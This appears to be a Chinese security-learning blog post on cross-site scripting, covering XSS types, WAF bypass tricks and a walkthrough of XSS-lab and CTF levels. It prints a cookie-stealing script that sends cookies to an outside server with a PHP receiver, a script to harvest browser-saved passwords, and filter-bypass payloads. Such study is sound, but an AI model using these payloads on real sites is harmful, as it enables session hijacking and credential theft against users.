<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>XSS跨站脚本攻击 | Hexo</title><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="基础知识：1、本质原理： 跨站脚本攻击XSS(Cross Site Scripting），为了不与CSS（Cascading Style Sheets）层叠样式表混淆，缩写为XSS。  原理演示：  网站服务器存在以下文件：  1&lt;?php $xss&#x3D;$_GET[&quot;id&quot;];echo $xss;?&gt;   此时访问该页面，上传参数 ?id&#x3D;&lt;scri">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS跨站脚本攻击">
<meta property="og:url" content="http://example.com/2023/09/22/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="基础知识：1、本质原理： 跨站脚本攻击XSS(Cross Site Scripting），为了不与CSS（Cascading Style Sheets）层叠样式表混淆，缩写为XSS。  原理演示：  网站服务器存在以下文件：  1&lt;?php $xss&#x3D;$_GET[&quot;id&quot;];echo $xss;?&gt;   此时访问该页面，上传参数 ?id&#x3D;&lt;scri">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png">
<meta property="article:published_time" content="2023-09-22T12:41:40.000Z">
<meta property="article:modified_time" content="2023-10-17T10:01:20.495Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2023/09/22/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'XSS跨站脚本攻击',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2023-10-17 18:01:20'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
    win.getCSS = (url,id = false) => new Promise((resolve, reject) => {
      const link = document.createElement('link')
      link.rel = 'stylesheet'
      link.href = url
      if (id) link.id = id
      link.onerror = reject
      link.onload = link.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        link.onload = link.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(link)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">11</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">4</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">0</div></a></div><hr class="custom-hr"/></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav id="nav"><span id="blog-info"><a href="/" title="Hexo"><span class="site-name">Hexo</span></a></span><div id="menus"><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">XSS跨站脚本攻击</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2023-09-22T12:41:40.000Z" title="Created 2023-09-22 20:41:40">2023-09-22</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2023-10-17T10:01:20.495Z" title="Updated 2023-10-17 18:01:20">2023-10-17</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="XSS跨站脚本攻击"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p><img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309222104611.png" alt="web漏洞-xss跨站"></p>
<h1 id="基础知识："><a href="#基础知识：" class="headerlink" title="基础知识："></a>基础知识：</h1><h2 id="1、本质原理："><a href="#1、本质原理：" class="headerlink" title="1、本质原理："></a>1、本质原理：</h2><ul>
<li><p>跨站脚本攻击XSS(Cross Site Scripting），为了不与CSS（Cascading Style Sheets）层叠样式表混淆，缩写为XSS。</p>
</li>
<li><p>原理演示：</p>
<ul>
<li>网站服务器存在以下文件：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="variable">$xss</span>=<span class="variable">$_GET</span>[<span class="string">&quot;id&quot;</span>];<span class="keyword">echo</span> <span class="variable">$xss</span>;<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>此时访问该页面，上传参数 ?id&#x3D;<code>&lt;script&gt; alert(1) &lt;/script&gt;</code></li>
<li>浏览器不会打印出原字符串，而是解析java script代码，出现一个错误弹窗。</li>
</ul>
</li>
<li><p>本质：</p>
<ul>
<li>恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页面时，嵌入Web里面的Script代码会被执行</li>
<li>达到恶意攻击用户的目的。XSS攻击针对的是<strong>用户层面的攻击</strong>！</li>
</ul>
</li>
<li><p>前提：</p>
<ul>
<li>网站服务器脚本，会输出一个<strong>客户端可以控制的值</strong>。</li>
<li>受使用的浏览器内核的影响，不同浏览器的安全策略可能不同。</li>
<li>需要用户主动触发漏洞。</li>
</ul>
</li>
</ul>
<h2 id="2、三大类："><a href="#2、三大类：" class="headerlink" title="2、三大类："></a>2、三大类：</h2><ul>
<li>反射型（非持续型）：<ul>
<li>攻击数据不存储到服务器中，<strong>危害较小。</strong><img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309222104614.png" alt="20190115094753418"></li>
</ul>
</li>
<li>存储型（持续型）：<ul>
<li>攻击数据存储到了服务器中，一旦访问该页面便会发起攻击。<img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309222104621.png" alt="20190115094820160"></li>
</ul>
</li>
<li>DOM型：<ul>
<li>文档对象模型(Document Objeet Model,DOM)。</li>
<li>用户获取网站内容时，不是将参数传给网站后端脚本，而是经过前端js函数处理，输出在了html源码中。</li>
<li>演示：<ul>
<li>网站A点击下一页更新显示内容时，url的参数改变了，说明参数传给了后端脚本处理。</li>
<li>网站B点击显示更多内容时，url没有改变，说明可能参数先交给前端代码处理后，再移交给后端。</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="3、常见攻击手法："><a href="#3、常见攻击手法：" class="headerlink" title="3、常见攻击手法："></a>3、常见攻击手法：</h2><ul>
<li><p>利用XSS接收平台：</p>
<ul>
<li>XSS平台注册账号，生成相应的JS代码</li>
<li>将生成的JS代码注入XSS漏洞点</li>
<li>受害者触发JS脚本</li>
<li>在XSS平台查看信息</li>
</ul>
</li>
<li><p>不用XSS平台，使用主机搭建的服务器</p>
<ul>
<li>手写JS代码：</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">  <span class="keyword">const</span> cookie = <span class="variable language_">document</span>.<span class="property">cookie</span>;</span><br><span class="line">  <span class="keyword">const</span> url = <span class="string">`https://www.long-time-no-see.cn/receive.php?cookie=<span class="subst">$&#123;cookie&#125;</span>`</span>;</span><br><span class="line">  <span class="keyword">const</span> script = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;script&#x27;</span>);</span><br><span class="line">  script.<span class="property">src</span> = url;</span><br><span class="line">  <span class="variable language_">document</span>.<span class="property">head</span>.<span class="title function_">appendChild</span>(script);</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>在自己的服务器<a href="http://www.long-time-no-see.cn中，写一个receive.php脚本用来接收信息：">www.long-time-no-see.cn中，写一个receive.php脚本用来接收信息：</a></li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$cookie</span>=<span class="variable">$_GET</span>[<span class="string">&quot;cookie&quot;</span>];</span><br><span class="line"><span class="variable">$my_file</span>=<span class="title function_ invoke__">fopen</span>(<span class="string">&quot;cookie.txt&quot;</span>,<span class="string">&quot;w&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">fwrite</span>(<span class="variable">$my_file</span>,<span class="variable">$cookie</span>);</span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$my_file</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>WebShell箱子利用：</p>
<ul>
<li>在webshell中，再写上后门，当某个人使用该webshell黑入某网站，自动将信息发送到某个服务器，从而webshell撰写者也获得了网站的后门权限。<ul>
<li>在webshell.php中，构造url和js代码</li>
<li>直接echo出js代码</li>
<li>自动向服务器发出信息</li>
</ul>
</li>
<li>同理，因为webshell箱子要查看收到的后门信息，所以webshell使用者在传出的信息插入XSS代码</li>
</ul>
</li>
<li><p>httponly破解：</p>
<ul>
<li><p>在cookie属性设置httponly后，支持HttpOnly的浏览器检测到包含HttpOnly标志的cookie，并且<strong>客户端脚本代码</strong>尝试读取该cookie，则浏览器将返回一个空字符串作为结果。</p>
</li>
<li><p>此时不能获取cookie，考虑<strong>直接获取账号密码</strong>：</p>
</li>
<li><p>浏览器保存的账号密码：</p>
<ul>
<li>浏览器需要知道我们访问的这个域名是否有保存过账户及密码。然后他会去查询网页中是否有当初我们保存账户及密码时的标签ID是否相同，如果都满足，那么浏览器就会在我们访问的时候，自动的将账户及密码填充进去。</li>
<li><strong>通过XSS创建一个form标签和两个input标签</strong>，并将ID设置为与登录框相同的ID。我们就有可能获取到保存的账号及密码。</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type=<span class="string">&quot;text/javascript&quot;</span>&gt;  </span><br><span class="line"><span class="variable language_">document</span>.<span class="title function_">write</span>(<span class="string">&quot;&lt;div&gt;&lt;/div&gt;&quot;</span>) <span class="keyword">var</span> form_1 = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;form&quot;</span>); form_1.<span class="property">id</span> = <span class="string">&#x27;f_id&#x27;</span>; </span><br><span class="line"><span class="variable language_">document</span>.<span class="title function_">getElementsByTagName</span>(<span class="string">&#x27;div&#x27;</span>)[<span class="number">0</span>].<span class="title function_">appendChild</span>(form_1); <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;f_id&#x27;</span>).<span class="property">style</span>.<span class="property">display</span>=<span class="string">&#x27;none&#x27;</span>; <span class="keyword">var</span> name_1 = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;input&quot;</span>); </span><br><span class="line"><span class="keyword">var</span> pass_1 = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;input&quot;</span>); name_1.<span class="property">type</span> = <span class="string">&quot;text&quot;</span>; name_1.<span class="property">name</span> = <span class="string">&quot;username&quot;</span>;</span><br><span class="line">name_1.<span class="property">id</span> = <span class="string">&quot;username&quot;</span> pass_1.<span class="property">type</span> = <span class="string">&quot;password&quot;</span>; </span><br><span class="line">pass_1.<span class="property">name</span> = <span class="string">&quot;password&quot;</span>; </span><br><span class="line">pass_1.<span class="property">id</span> = <span class="string">&quot;password&quot;</span>; form_1.<span class="title function_">appendChild</span>(name_1); form_1.<span class="title function_">appendChild</span>(pass_1); </span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
<h1 id="WAF绕过："><a href="#WAF绕过：" class="headerlink" title="WAF绕过："></a>WAF绕过：</h1><h2 id="1、常规思路："><a href="#1、常规思路：" class="headerlink" title="1、常规思路："></a>1、常规思路：</h2><ul>
<li>手工：<ul>
<li>标签语法替换 </li>
<li>特殊符号干扰 </li>
<li>提交方式更改 </li>
<li>垃圾数据溢出 </li>
<li>加密解密算法 </li>
<li>结合其他漏洞绕过</li>
</ul>
</li>
<li>工具生成XSS绕过代码</li>
</ul>
<h2 id="2、自动化工具XSStrike："><a href="#2、自动化工具XSStrike：" class="headerlink" title="2、自动化工具XSStrike："></a>2、自动化工具XSStrike：</h2><ul>
<li>主要语法：<ul>
<li>-h, –help 			&#x2F;&#x2F;显示帮助信息</li>
<li>-u, –url 			&#x2F;&#x2F;指定目标 URL</li>
<li>-f, –file 			&#x2F;&#x2F;加载自定义 paload 字典</li>
<li>-t, –threads 	&#x2F;&#x2F;定义线程数</li>
<li>–fuzzer 				&#x2F;&#x2F;测试过滤器和 Web 应用程序防火墙。</li>
<li>–update 				&#x2F;&#x2F;更新</li>
</ul>
</li>
</ul>
<h2 id="3、-安全预防"><a href="#3、-安全预防" class="headerlink" title="3、 安全预防"></a>3、 安全预防</h2><ul>
<li>httponly</li>
<li>输入过滤</li>
<li>输出过滤</li>
</ul>
<h1 id="XSSLAB闯关："><a href="#XSSLAB闯关：" class="headerlink" title="XSSLAB闯关："></a>XSSLAB闯关：</h1><h2 id="level1："><a href="#level1：" class="headerlink" title="level1："></a>level1：</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>



<h2 id="level2："><a href="#level2：" class="headerlink" title="level2："></a>level2：</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt; //直接闭合</span></span><br></pre></td></tr></table></figure>



<h2 id="level3："><a href="#level3：" class="headerlink" title="level3："></a>level3：</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//利用html中onclick属性，当点击一段按钮时，执行一段javascript代码</span></span><br><span class="line">onclick=<span class="string">&quot;alert(1)&quot;</span></span><br><span class="line">本质在input标签插入了onclick属性</span><br><span class="line">&lt;input name=<span class="string">&quot;keyword&quot;</span> value=<span class="string">&quot;var&quot;</span>&gt; <span class="comment">//var可以控制，将引号闭合即可</span></span><br><span class="line"><span class="string">&#x27; onclick=&#x27;</span><span class="title function_">alert</span>(<span class="number">1</span>)		<span class="comment">//此处使用单引号闭合，因为浏览器会将所有单双引号都转为双引号，不能只看f12源码</span></span><br><span class="line">&lt;input name=<span class="string">&quot;keyword&quot;</span> value=<span class="string">&quot;&#x27; onclick=&#x27;alert(1)&quot;</span>&gt;</span><br></pre></td></tr></table></figure>




<h2 id="level4："><a href="#level4：" class="headerlink" title="level4："></a>level4：</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot; onclick=&quot;</span><span class="title function_">alert</span>(<span class="number">1</span>) <span class="comment">//双引号闭合</span></span><br></pre></td></tr></table></figure>



<h2 id="level5："><a href="#level5：" class="headerlink" title="level5："></a>level5：</h2><ul>
<li>使用上面的语句，发现script和onclick都出现了下划线干扰，说明存在关键字检测</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;&gt; &lt;a href=javascript:alert(&#x27;xss&#x27;) &gt; 超链接名字&lt;/a&gt;</span></span><br><span class="line"><span class="string">//html超链接标签也支持js脚本</span></span><br></pre></td></tr></table></figure>



<h2 id="level6："><a href="#level6：" class="headerlink" title="level6："></a>level6：</h2><ul>
<li>href也出现下划线：</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;&gt; &lt;a Href=javascript:alert(&#x27;xss&#x27;) &gt; 超链接名字&lt;/a&gt;</span></span><br><span class="line"><span class="string">//改变大小写即可</span></span><br></pre></td></tr></table></figure>



<h2 id="level7："><a href="#level7：" class="headerlink" title="level7："></a>level7：</h2><ul>
<li>href和script和on被删除：</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//此处的过滤不是循环过滤，scscriptript过滤一次变为script成功绕过</span></span><br><span class="line"><span class="string">&quot;&gt; &lt;a hrhrefef=javascscriptript:alert(&#x27;xss&#x27;) &gt; 超链接名字&lt;/a&gt;</span></span><br></pre></td></tr></table></figure>



<h2 id="level8："><a href="#level8：" class="headerlink" title="level8："></a>level8：</h2><ul>
<li><p>此处页面显示添加友情链接，输入的内容会自动加在a标签中的href属性中</p>
</li>
<li><p>直接输入javascript:alert(‘xss’) ,script被加上下划线</p>
</li>
<li><p><strong>此时考虑将代码转换成转义序列，一般的脚本无法处理它，但浏览器却可以正常解析</strong></p>
</li>
<li><pre><code class="javascript">javascript:alert(&#39;xss&#39;)
转换为
&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#120;&amp;#115;&amp;#115;&amp;#39;&amp;#41;
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">## level9：</span><br><span class="line"></span><br><span class="line">- 尝试多种内容，均只回显你的连接不合法，此时不看源码很难发现。</span><br><span class="line"></span><br><span class="line">```javascript</span><br><span class="line">查看源码发现，必须有http://才合法，为了避免http://干扰，在前面加上注释符//</span><br><span class="line">javaScript:alert(&#x27;xss&#x27;)//http://</span><br><span class="line">仍然不行,script被加上下划线，将前面的变为转移序列：</span><br><span class="line">&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#83;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;:alert(&#x27;xss&#x27;)//http://</span><br><span class="line">成功绕过</span><br></pre></td></tr></table></figure>
</code></pre>
</li>
</ul>
<h2 id="level10："><a href="#level10：" class="headerlink" title="level10："></a>level10：</h2><ul>
<li><p>f12查看源码，发现keyword不在表单中，且&lt;&gt;被过滤，同时发现三个hidden的input，t_link,t_history,t_sort</p>
</li>
<li><p>此时三个隐藏的input，发现应该是t_sort</p>
</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot; onclick=&#x27;alert(1)&#x27; type=&#x27;text&#x27;  //让隐藏的输入框出现，也可以直接浏览器修改前端代码</span></span><br></pre></td></tr></table></figure>



<h2 id="level11"><a href="#level11" class="headerlink" title="level11:"></a>level11:</h2><ul>
<li>四个隐藏表单，get传值，只有t_sort有变化，但是此处的双引号被编码成&amp;quot; 不再有闭合效果</li>
<li>查看源码发现，http请求中referer的值被拼接到了t_ref中，故先抓包，再添加referer</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">Referer</span>:<span class="string">&quot; onclick=&quot;</span><span class="title function_">alert</span>(<span class="number">1</span>)<span class="string">&quot; type=&quot;</span>text<span class="string">&quot;  //注意是冒号不是等于号</span></span><br></pre></td></tr></table></figure>



<h2 id="level2"><a href="#level2" class="headerlink" title="level2:"></a>level2:</h2><ul>
<li>查看源码，发现http请求的User-Agent被拼接到了input标签中</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">User</span>-<span class="title class_">Agent</span>:<span class="string">&quot; onclick=&quot;</span><span class="title function_">alert</span>(<span class="number">1</span>)<span class="string">&quot; type=&quot;</span>text<span class="string">&quot;</span></span><br></pre></td></tr></table></figure>



<h2 id="level13："><a href="#level13：" class="headerlink" title="level13："></a>level13：</h2><ul>
<li>XSS注入点：Cookie:user&#x3D;” onclick&#x3D;”alert(1)” type&#x3D;”text”</li>
<li>cookie名必须是user</li>
</ul>
<h2 id="level14："><a href="#level14：" class="headerlink" title="level14："></a>level14：</h2><ul>
<li>有问题，跳过</li>
</ul>
<h2 id="level15："><a href="#level15：" class="headerlink" title="level15："></a>level15：</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?src=<span class="string">&#x27;level1.php?name=&lt;img src=1 onerror=alert(1)&gt;&#x27;</span></span><br></pre></td></tr></table></figure>

<h2 id="level16："><a href="#level16：" class="headerlink" title="level16："></a>level16：</h2><h1 id="靶场："><a href="#靶场：" class="headerlink" title="靶场："></a>靶场：</h1><h2 id="1、留言板："><a href="#1、留言板：" class="headerlink" title="1、留言板："></a>1、留言板：</h2><ul>
<li><p><a target="_blank" rel="noopener" href="https://ctf.bugku.com/challenges/detail/id/385.html">https://ctf.bugku.com/challenges/detail/id/385.html</a></p>
</li>
<li><p>XSS平台：<a target="_blank" rel="noopener" href="http://xsscom.com//index.php">http://xsscom.com//index.php</a></p>
</li>
<li><p>双写绕过关键字过滤</p>
</li>
<li><p>反斜杠&#x2F;绕过空格过滤！！（具体原因不清楚，但是是用的普通斜杠）</p>
</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scrscriptipt/src=xsscom.<span class="property">com</span><span class="comment">//8s7CIB&gt; &lt;/scrscriptipt&gt;</span></span><br></pre></td></tr></table></figure>



</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="http://example.com">John Doe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2023/09/22/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/">http://example.com/2023/09/22/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web%E5%AE%89%E5%85%A8/">web安全</a></div><div class="post_share"><div class="social-share" data-image="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2023/10/17/01-Set-UID%E7%89%B9%E6%9D%83%E7%A8%8B%E5%BA%8F/" title="《计算机安全导论：深度实践》第一章Set-UID特权程序学习笔记"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">《计算机安全导论：深度实践》第一章Set-UID特权程序学习笔记</div></div></a></div><div class="next-post pull-right"><a href="/2023/09/22/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" title="文件上传"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">文件上传</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>Related Articles</span></div><div class="relatedPosts-list"><div><a href="/2023/09/14/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/" title="sql注入"><div class="cover" style="background: var(--default-bg-color)"></div><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-09-14</div><div class="title">sql注入</div></div></a></div><div><a href="/2023/09/22/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" title="文件上传"><div class="cover" style="background: var(--default-bg-color)"></div><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-09-22</div><div class="title">文件上传</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">John Doe</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">11</div></a><a href="/tags/"><div 